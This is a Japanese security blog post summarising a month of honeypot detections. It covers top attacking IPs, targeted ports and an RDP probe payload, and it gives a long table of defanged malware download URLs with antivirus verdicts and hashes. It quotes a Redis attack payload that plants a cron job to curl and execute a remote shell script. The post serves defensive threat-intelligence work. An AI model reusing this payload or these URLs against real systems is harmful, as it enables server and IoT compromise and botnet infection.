sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(2020年5月度)

5月度のHoneytrapの検知情報を取りまとめたものとなります。その中で気になった情報をピックアップして記載しています。

Honeytrap(Total)

Number of detections

f:id:one-chick-sec:20200718182330p:plain

<分析>
特に特徴的な検知はなし

RemoteIP(TOP20)

IP Country Count AbuseIPDB
185[.]202[.]1[.]19 France 205775 件 Link
185[.]202[.]1[.]10 France 27847 件 Link
198[.]108[.]67[.]48 United States 26736 件 Link
185[.]158[.]113[.]43 Russia 26052 件 Link
185[.]202[.]2[.]120 France 16026 件 Link
218[.]92[.]0[.]211 China 13909 件 Link
45[.]141[.]87[.]2 Russia 12061 件 Link
193[.]106[.]31[.]106 Ukraine 9990 件 Link
218[.]92[.]0[.]208 China 8576 件 Link
141[.]98[.]9[.]54 Republic of Lithuania 8027 件 Link
185[.]202[.]1[.]85 France 6780 件 Link
91[.]211[.]105[.]92 Russia 4055 件 Link
49[.]88[.]112[.]74 China 3927 件 Link
194[.]61[.]54[.]237 Russia 3556 件 Link
185[.]202[.]2[.]77 France 3536 件 Link
198[.]245[.]50[.]167 Canada 3013 件 Link
218[.]189[.]86[.]210 Hong Kong 2808 件 Link
107[.]172[.]27[.]209 United States 2767 件 Link
49[.]88[.]112[.]68 China 2724 件 Link
27[.]115[.]124[.]74 China 2552 件 Link

<分析>
IP:185[.]202[.]1[.]19から大量の通信を検知していました。検知内容はRDPへの不正アクセスを狙ったものでした。ポート番号は3389(TCP)ではなく幅広いポートを対象にしていました。
ペイロード:
x03x00x00/*xe0x00x00x00x00x00Cookie: mstshash=Administrrnx01x00x08x00x03x00x00x00

検知数もほぼ毎日検知していました。
<検知数> f:id:one-chick-sec:20200719173319p:plain

Port(TOP20)

Port Service Count
22 The Secure Shell (SSH) Protocol 72727 件
445 Microsoft-DS 51713 件
1433 Microsoft-SQL-Server 33141 件
3389 MS WBT Server 17220 件
37777 Unknown 4423 件
2222 SSH 2762 件
22022 Unknown 2235 件
139 NETBIOS Session Service 2095 件
4506 Unknown 1873 件
8080 HTTP Alternate (see port 80) 1698 件
81 Unknown 1639 件
6000 Unknown 1259 件
5060 SIP 891 件
8081 Sun Proxy Admin Service 810 件
8443 PCsync HTTPS 793 件
37215 Unknown 780 件
5555 Android Debug Bridge 707 件
8291 Unknown 697 件
502 Modbus Application Protocol 681 件
8000 iRDMI 609 件

<分析>
Port 37777:
Port 37777 宛への通信ですが、5/6-5/13の間で増加していました。 通信内容から明確にどの脆弱性を狙ったかどうかは不明でしたが、Miraiでも利用されたものであるため、IoT系の通信を狙ったものかと思われます。

IoTマルウェア「Mirai」のボット化作戦進行中? 警察庁が警戒呼び掛け

f:id:one-chick-sec:20200719234653p:plain

Malware

hxxp://d[.]powerofwish[.]com/pm[.]sh(324件)

Redisをターゲットした攻撃でダウンロードされるマルウェアとなります。
Payload:
3rn$3rnSETrn$5rnBack1rn$63rntn/20 * * * * curl -fsSL hxxp://d[.]powerofwish[.]com/pm.sh | shntrn

現在は以下のページのようになっており、マルウェアのダウンロードは成功しません.

f:id:one-chick-sec:20200719183021p:plain

以前はGafgytをインストールを試みるものでした。
VirusTotal


以降は検知した情報を参考として記載しておきます。

First Ditection MalwareURL Count VirusTotal SHA1
2020-03-14 hxxp://d[.]powerofwish[.]com/pm[.]sh 324 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-20 hxxp://178[.]33[.]64[.]107/arm7 49 NG No Hash
2020-05-12 hxxp://82[.]118[.]242[.]107/infect 34 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-10 hxxp://176[.]123[.]3[.]96/arm7 33 NG No Hash
2020-05-23 hxxp://23[.]254[.]228[.]86/0xxx0xxxasdajshdsajhkgdja/Sa0aS[.]mips 25 NG 80acf54872835111edf08d5697b3991c7e698c1d
2020-05-13 hxxp://96[.]30[.]193[.]26/arm7 24 NG No Hash
2020-05-28 hxxp://1[.]1[.]1[.]1/bins[.]sh 23 NG f5e4557bc01aa7212007e37dccbe0eff222a1946
2020-05-18 hxxp://136[.]244[.]77[.]163/bins/mpsl 18 NG No Hash
2020-03-15 hxxp://185[.]62[.]189[.]18/jaws[.]sh 14 NG No Hash
2020-04-01 hxxp://192[.]3[.]45[.]185/arm7 11 NG No Hash
2020-04-11 hxxp://178[.]32[.]148[.]5/arm7 10 NG No Hash
2020-03-31 hxxp://192[.]168[.]1[.]1:8088/Mozi[.]m 9 NG No Hash
2020-05-28 hxxp://142[.]11[.]206[.]153/PrIoRvNg[.]sh 9 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-21 hxxp://212[.]114[.]52[.]128/arm7 8 MicroWorld-eScan:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
Arcabit:Trojan[.]Backdoor[.]Linux[.]Tsunami[.]1,
ESET-NOD32:a variant of Linux/IRCBot[.]P,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO20,
Avast:ELF:Gafgyt-FH [Trj],
ClamAV:Unix[.]Trojan[.]Mirai-5607483-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Tsunami[.]ci,
BitDefender:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
Ad-Aware:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
TrendMicro:Possible_MIRAI[.]SMLBO20,
FireEye:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
Emsisoft:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1 (B),
Ikarus:Trojan[.]Linux[.]Gafgyt,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Tsunami[.]ci,
Avast-Mobile:ELF:Gafgyt-FH [Trj],
GData:Linux[.]Trojan[.]Gafgyt[.]B,
AhnLab-V3:Linux/Gafgyt[.]Gen44,
BitDefenderTheta:Gen:NN[.]Mirai[.]34106,
ALYac:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
MAX:malware (ai score=88),
Fortinet:ELF/Tsunami[.]NDJ!tr,
AVG:ELF:Gafgyt-FH [Trj]		 87a66ae42d2581ae05e638b49bf69a9d82830861
2020-03-15 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 8 DrWeb:Linux[.]BtcMine[.]222,
McAfee:Linux/CoinMiner[.]x,
Sangfor:Malware,
Symantec:Downloader,
Avast:BV:Miner-BR [Drp],
ClamAV:Txt[.]Coinminer[.]Downloader-6811173-0,
Tencent:Heur:Trojan[.]Linux[.]Downloader[.]i,
McAfee-GW-Edition:Linux/CoinMiner[.]x,
Jiangmin:Trojan[.]GenericKD[.]bju,
AhnLab-V3:Downloader/Shell[.]ElfMiner[.]S1114,
Microsoft:TrojanDownloader:Linux/miner[.]AB!MTB,
Rising:Trojan[.]Miner/SHELL!1[.]BF8A (CLASSIC),
AVG:BV:Miner-BR [Drp]		 84f4412443bd6de78a9bab54a0d8a07540762173
2020-05-22 hxxp://45[.]95[.]168[.]97/le[.]bot[.]arm7 7 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
McAfee:Linux/Mirai[.]f,
BitDefenderTheta:Gen:NN[.]Mirai[.]34122,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO2,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
F-Secure:Malware[.]LINUX/Mirai[.]abhei,
TrendMicro:Possible_MIRAI[.]SMLBO2,
McAfee-GW-Edition:Linux/Mirai[.]f,
Sophos:Linux/DDoS-CI,
Ikarus:Trojan[.]Linux[.]Mirai,
Avira:LINUX/Mirai[.]abhei,
Fortinet:ELF/Mirai[.]A!tr,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
MAX:malware (ai score=89),
ESET-NOD32:a variant of Linux/Mirai[.]AXB,
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
AVG:ELF:Mirai-AOT [Trj]		 0cbea13947cf49248bbca6946b29219fbb6291dc
2020-04-16 hxxp://185[.]172[.]110[.]224/ab/arm7 6 MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1,
McAfee:RDN/Generic BackDoor,
Zillya:Trojan[.]Mirai[.]Linux[.]36985,
Arcabit:Trojan[.]Linux[.]Mirai[.]1,
BitDefenderTheta:Gen:NN[.]Mirai[.]34104,
Cyren:ELF/Trojan[.]ORNV-8,
Symantec:Linux[.]Mirai,
ESET-NOD32:a variant of Linux/Mirai[.]A,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO13,
Avast:ELF:Mirai-FY [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7136013-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Trojan[.]Linux[.]Mirai[.]1,
NANO-Antivirus:Trojan[.]ElfArm32[.]Mirai[.]hcbjpj,
AegisLab:Trojan[.]Linux[.]Mirai[.]K!c,
Ad-Aware:Trojan[.]Linux[.]Mirai[.]1,
Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B),
F-Secure:Malware[.]LINUX/Mirai[.]exfuh,
DrWeb:Linux[.]Mirai[.]791,
TrendMicro:Possible_MIRAI[.]SMLBO13,
McAfee-GW-Edition:RDN/Generic BackDoor,
FireEye:Trojan[.]Linux[.]Mirai[.]1,
Sophos:Mal/Generic-S,
Ikarus:Trojan[.]Linux[.]Mirai,
Avira:LINUX/Mirai[.]exfuh,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Mirai[.]b,
Microsoft:Trojan:Win32/Skeeyah[.]A!rfn,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-FY [Trj],
GData:Trojan[.]Linux[.]Mirai[.]1,
AhnLab-V3:Linux/Mirai[.]Gen35,
ALYac:Trojan[.]Linux[.]Mirai[.]1,
MAX:malware (ai score=87),
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
Fortinet:ELF/Mirai[.]AE!tr,
AVG:ELF:Mirai-FY [Trj],
Qihoo-360:Linux/Backdoor[.]6f4		 cafe119831a6ba613e71abf82c8e3e8896f7fadf
2020-04-11 hxxp://19ce033f[.]ngrok[.]io/arm7 6 NG No Hash
2020-05-10 hxxp://185[.]163[.]45[.]122/scripts/lilin[.]sh 6 NG No Hash
2020-05-12 hxxp://185[.]172[.]110[.]235/scripts/lilin[.]sh 6 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-04-29 hxxp://147[.]75[.]67[.]253/bins/mpsl 5 NG No Hash
2020-03-15 hxxp://185[.]172[.]110[.]224/wget 5 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-04 hxxp://5[.]252[.]179[.]60/b/sys[.]sh 5 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-03-16 hxxp://ero[.]bckl[.]ir/download[.]exe 5 Bkav:W32[.]AIDetectVM[.]malware2,
DrWeb:Trojan[.]DownLoader25[.]10311,
MicroWorld-eScan:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9,
FireEye:Generic[.]mg[.]464b6eed6da0b440,
CAT-QuickHeal:Trojan[.]Mauvaise[.]SL1,
McAfee:Artemis!464B6EED6DA0,
Cylance:Unsafe,
Sangfor:Malware,
K7AntiVirus:Trojan-Downloader ( 0054d9311 ),
Alibaba:TrojanDownloader:Win32/Siscos[.]b637bd30,
K7GW:Trojan-Downloader ( 0054d9311 ),
Cybereason:malicious[.]d6da0b,
Invincea:heuristic,
BitDefenderTheta:Gen:NN[.]ZexaF[.]34106[.]fmGfaqD4Emmj,
F-Prot:W32/Blackmoon[.]M[.]gen!Eldorado,
APEX:Malicious,
Avast:Win32:DropperX-gen [Drp],
ClamAV:Win[.]Dropper[.]Gh0stRAT-6989861-0,
Kaspersky:Trojan[.]Win32[.]Siscos[.]wgv,
BitDefender:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9,
Paloalto:generic[.]ml,
AegisLab:Trojan[.]Win32[.]Siscos[.]4!c,
Rising:Backdoor[.]Zegost!8[.]177 (TFE:5:GhyWtHWPdCV),
Endgame:malicious (moderate confidence),
Emsisoft:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9 (B),
Comodo:Packed[.]Win32[.]MUPX[.]Gen@24tbus,
F-Secure:Heuristic[.]HEUR/AGEN[.]1046309,
VIPRE:Trojan[.]Win32[.]Generic!BT,
TrendMicro:Backdoor[.]Win32[.]ZEGOST[.]SMS,
McAfee-GW-Edition:BehavesLike[.]Win32[.]Generic[.]nc,
Trapmine:malicious[.]high[.]ml[.]score,
Sophos:Troj/Agent-AWJO,
SentinelOne:DFI - Malicious PE,
Cyren:W32/Blackmoon[.]M[.]gen!Eldorado,
Jiangmin:Trojan[.]Siscos[.]on,
Webroot:W32[.]Trojan[.]Gen,
Avira:HEUR/AGEN[.]1120058,
Fortinet:W32/Kryptik[.]FHSF!tr,
Arcabit:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9,
ZoneAlarm:Trojan[.]Win32[.]Siscos[.]wgv,
Microsoft:Trojan:Win32/Occamy[.]C,
AhnLab-V3:Trojan/Win32[.]Kryptik[.]R265106,
Acronis:suspicious,
VBA32:BScope[.]Backdoor[.]BlackHole,
ALYac:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9,
MAX:malware (ai score=87),
Ad-Aware:DeepScan:Generic[.]Malware[.]SFM![.]E756E9A9,
ESET-NOD32:a variant of Win32/TrojanDownloader[.]Tiny[.]NQG,
TrendMicro-HouseCall:Backdoor[.]Win32[.]ZEGOST[.]SMS,
Tencent:Win32[.]Trojan[.]Siscos[.]Pbpj,
Yandex:Trojan[.]DL[.]Tiny!4tBm70nSouk,
Ikarus:AdWare[.]Win32[.]BlackMoon,
eGambit:Unsafe[.]AI_Score_99%,
GData:Win32[.]Trojan[.]Agent[.]WP,
MaxSecure:Trojan[.]Malware[.]300983[.]susgen,
AVG:Win32:DropperX-gen [Drp],
Panda:Trj/Genetic[.]gen,
CrowdStrike:win/malicious_confidence_90% (W),
Qihoo-360:Win32/Trojan[.]ee5		 c083dd1415e74e193f1d2b6c65f4bb154cf15a58
2020-05-05 hxxp://192[.]236[.]146[.]53:1691/jigoku[.]arm7 4 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
McAfee:Linux/Mirai[.]f,
Sangfor:Malware,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO13,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Rising:Backdoor[.]Mirai/Linux!1[.]BD1A (CLASSIC),
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
DrWeb:Linux[.]Mirai[.]4238,
TrendMicro:Possible_MIRAI[.]SMLBO13,
McAfee-GW-Edition:Linux/Mirai[.]f,
Sophos:Linux/DDoS-CI,
Ikarus:Trojan[.]Linux[.]Mirai,
Fortinet:ELF/Mirai[.]IA!tr,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
MAX:malware (ai score=83),
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
AVG:ELF:Mirai-AOT [Trj]		 7f1acc1d312691501442fe764a0585bfb2201e91
2020-05-07 hxxp://178[.]32[.]148[.]2/arm7 3 DrWeb:Linux[.]BackDoor[.]Fgt[.]1755,
MicroWorld-eScan:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
TrendMicro-HouseCall:Backdoor[.]Linux[.]BASHLITE[.]SMJC,
Avast:ELF:Gafgyt-FH [Trj],
ClamAV:Unix[.]Trojan[.]Gafgyt-7643791-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Tsunami[.]ci,
BitDefender:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
Ad-Aware:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
TrendMicro:Backdoor[.]Linux[.]BASHLITE[.]SMJC,
FireEye:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
Emsisoft:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1 (B),
Ikarus:Trojan[.]Linux[.]Gafgyt,
Fortinet:ELF/Tsunami[.]NDJ!tr,
Arcabit:Trojan[.]Backdoor[.]Linux[.]Tsunami[.]1,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Tsunami[.]ci,
Avast-Mobile:ELF:Gafgyt-FH [Trj],
AhnLab-V3:Linux/Gafgyt[.]Gen44,
ALYac:Gen:Variant[.]Backdoor[.]Linux[.]Tsunami[.]1,
MAX:malware (ai score=85),
ESET-NOD32:a variant of Linux/Tsunami[.]NDJ,
Rising:Backdoor[.]Hoaxcalls!1[.]C61C (CLASSIC),
GData:Linux[.]Trojan[.]Gafgyt[.]B,
AVG:ELF:Gafgyt-FH [Trj]		 3a9a4df9ebfb5b8b99bc78c44803def92457d435
2020-05-11 hxxp://185[.]172[.]110[.]235/185[.]172[.]110[.]235 3 NG No Hash
2020-05-13 hxxp://139[.]99[.]237[.]109/infect 3 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-13 hxxp://192[.]236[.]146[.]53:1691/arm7 3 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO13,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
DrWeb:Linux[.]Mirai[.]4238,
TrendMicro:Possible_MIRAI[.]SMLBO13,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Sophos:Linux/DDoS-CI,
Ikarus:Trojan[.]Linux[.]Mirai,
Fortinet:ELF/Mirai[.]AE!tr,
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
MAX:malware (ai score=82),
ESET-NOD32:a variant of Linux/Mirai[.]AWM,
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
AVG:ELF:Mirai-AOT [Trj]		 96d42f766461d9f8f9349dff7df45aa9e9df1123
2020-05-18 hxxp://91[.]92[.]66[.]87/wget 3 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-18 hxxp://192[.]236[.]146[.]53/le[.]bot[.]arm7 3 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
McAfee:Linux/Mirai[.]f,
BitDefenderTheta:Gen:NN[.]Mirai[.]34110,
Symantec:Trojan[.]Gen[.]NPE,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO2,
Avast:ELF:Mirai-AOT [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135925-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Rising:Backdoor[.]Mirai!8[.]E05B (TFE:1D:5hNkV1VeYFK),
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9 (B),
TrendMicro:Possible_MIRAI[.]SMLBO2,
Sophos:Linux/DDoS-CI,
Fortinet:ELF/Mirai[.]AE!tr,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]9,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-ATJ [Trj],
Microsoft:Trojan:Linux/Mirai[.]SP!MSR,
MAX:malware (ai score=83),
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
Ikarus:Trojan[.]Linux[.]Mirai,
GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]9,
AVG:ELF:Mirai-AOT [Trj]		 86158ef7e19729f48c277bb390fe1b34ddc42875
2020-05-18 hxxp://YOURIPHERE/bins/mpsl 3 NG No Hash
2020-05-23 hxxp://37[.]49[.]226[.]194/Gbotbins[.]sh 3 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-25 hxxp://37[.]49[.]226[.]35/0xxx0xxxasdajshdsajhkgdja/Sa0aS[.]mips 3 DrWeb:Linux[.]Mirai[.]671,
ESET-NOD32:a variant of Linux/Mirai[.]OX,
ClamAV:Unix[.]Dropper[.]Mirai-7135870-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC),
Fortinet:ELF/DDoS[.]CIA!tr,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Tencent:Backdoor[.]Linux[.]Mirai[.]wao,
Ikarus:Trojan[.]Linux[.]Mirai		 7f2839c49194fdc1d89093be2cbd5c907ed53ab8
2020-04-30 hxxp://88[.]218[.]16[.]118/infect 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-01 hxxp://23[.]95[.]89[.]93/bins/mpsl 2 MicroWorld-eScan:Trojan[.]GenericKD[.]43074164,
Arcabit:Trojan[.]Generic[.]D2914274,
ESET-NOD32:a variant of Linux/Mirai[.]L,
Avast:ELF:Mirai-AJM [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7136015-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Trojan[.]GenericKD[.]43074164,
Rising:Backdoor[.]Gafgyt/Linux!1[.]A512 (TFE:15:F1UufTfIRQD),
Ad-Aware:Trojan[.]GenericKD[.]43074164,
DrWeb:Linux[.]Mirai[.]53,
Emsisoft:Trojan[.]GenericKD[.]43074164 (B),
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
GData:Trojan[.]GenericKD[.]43074164,
MAX:malware (ai score=83),
Tencent:Backdoor[.]Linux[.]Mirai[.]t,
Ikarus:Trojan[.]Linux[.]Mirai,
Fortinet:ELF/DDoS[.]CIA!tr,
AVG:ELF:Mirai-AJM [Trj]		 990c67a58ddb5c009b56281e5b5f5a703f025804
2020-03-26 hxxp://pm[.]cpuminerpool[.]com/pm[.]sh 2 NG No Hash
2020-05-03 hxxp://185[.]244[.]150[.]141/infect 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-03-31 hxxp://91[.]92[.]66[.]124/ 2 NG No Hash
2020-05-07 hxxp://192[.]236[.]192[.]710/xxx0xxxasdajshdsajhkgdja/Sa0aS[.]mips 2 NG No Hash
2020-05-07 hxxp://217[.]61[.]124[.]35/[.]c 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-08 hxxp://80[.]211[.]9[.]67/mips 2 NG 9b0f84960f913dbf2ffa22a0447cb7b4f6f2bb22
2020-05-08 hxxp://194[.]36[.]188[.]1700/mipsel 2 NG No Hash
2020-04-05 hxxp://pm[.]ipfswallet[.]tk/pm[.]sh 2 NG No Hash
2020-05-13 hxxp://185[.]172[.]110[.]235/ab/arm7 2 MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1,
McAfee:RDN/Generic BackDoor,
Zillya:Trojan[.]Mirai[.]Linux[.]36985,
Symantec:Linux[.]Mirai,
ESET-NOD32:a variant of Linux/Mirai[.]A,
TrendMicro-HouseCall:Possible_MIRAI[.]SMLBO13,
Avast:ELF:Mirai-FY [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7136013-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
BitDefender:Trojan[.]Linux[.]Mirai[.]1,
NANO-Antivirus:Trojan[.]ElfArm32[.]Mirai[.]hcbjpj,
AegisLab:Trojan[.]Linux[.]Mirai[.]K!c,
Tencent:Backdoor[.]Linux[.]Mirai[.]wam,
Ad-Aware:Trojan[.]Linux[.]Mirai[.]1,
Sophos:Mal/Generic-S,
F-Secure:Malware[.]LINUX/Mirai[.]exfuh,
DrWeb:Linux[.]Mirai[.]791,
TrendMicro:Possible_MIRAI[.]SMLBO13,
McAfee-GW-Edition:RDN/Generic BackDoor,
FireEye:Trojan[.]Linux[.]Mirai[.]1,
Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B),
Cyren:ELF/Trojan[.]ORNV-8,
Jiangmin:Backdoor[.]Linux[.]enfr,
Avira:LINUX/Mirai[.]exfuh,
Antiy-AVL:Trojan[Backdoor]/Linux[.]Mirai[.]b,
Microsoft:Backdoor:Linux/Mirai[.]YA!MTB,
Arcabit:Trojan[.]Linux[.]Mirai[.]1,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b,
Avast-Mobile:ELF:Mirai-FY [Trj],
GData:Trojan[.]Linux[.]Mirai[.]1,
AhnLab-V3:Linux/Mirai[.]Gen35,
BitDefenderTheta:Gen:NN[.]Mirai[.]34108,
ALYac:Trojan[.]Linux[.]Mirai[.]1,
MAX:malware (ai score=100),
Ikarus:Trojan[.]Linux[.]Mirai,
Fortinet:ELF/Mirai[.]AE!tr,
AVG:ELF:Mirai-FY [Trj],
Qihoo-360:Linux/Backdoor[.]6f4		 cafe119831a6ba613e71abf82c8e3e8896f7fadf
2020-05-20 hxxp://37[.]49[.]226[.]49/Jaws[.]sh 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-20 hxxp://45[.]14[.]224[.]204/Beastmode[.]sh 2 No Data da39a3ee5e6b4b0d3255bfef95601890afd80709
2020-05-21 hxxp://38[.]68[.]46[.]110/mips 2 MicroWorld-eScan:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
McAfee:Linux/Mirai[.]g,
Sangfor:Malware,
Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]5,
BitDefenderTheta:Gen:NN[.]Mirai[.]34110,
Cyren:ELF/Mirai[.]D[.]gen!Camelot,
Symantec:Trojan[.]Gen[.]NPE,
ESET-NOD32:a variant of Linux/Mirai[.]AE,
TrendMicro-HouseCall:Trojan[.]Linux[.]MIRAI[.]SMMR1,
Avast:ELF:Mirai-AMV [Trj],
ClamAV:Unix[.]Dropper[.]Mirai-7135944-0,
Kaspersky:HEUR:Backdoor[.]Linux[.]Gafgyt[.]bj,
BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
Tencent:Backdoor[.]Linux[.]Gafgyt[.]bs,
Ad-Aware:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5 (B),
F-Secure:Malware[.]LINUX/Mirai[.]pzdem,
DrWeb:Linux[.]BackDoor[.]Fgt[.]3324,
TrendMicro:Trojan[.]Linux[.]MIRAI[.]SMMR1,
McAfee-GW-Edition:Linux/Mirai[.]g,
Sophos:Linux/DDoS-CIA,
Ikarus:Trojan[.]Linux[.]Mirai,
Avira:LINUX/Mirai[.]pzdem,
Fortinet:ELF/Mirai[.]B!tr,
Microsoft:DDoS:Linux/Gafgyt[.]YA!MTB,
AegisLab:Trojan[.]Linux[.]Gafgyt[.]m!c,
ZoneAlarm:HEUR:Backdoor[.]Linux[.]Gafgyt[.]bj,
Avast-Mobile:ELF:Mirai-UM [Trj],
AhnLab-V3:Linux/Mirai[.]Gen6,
ALYac:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]5,
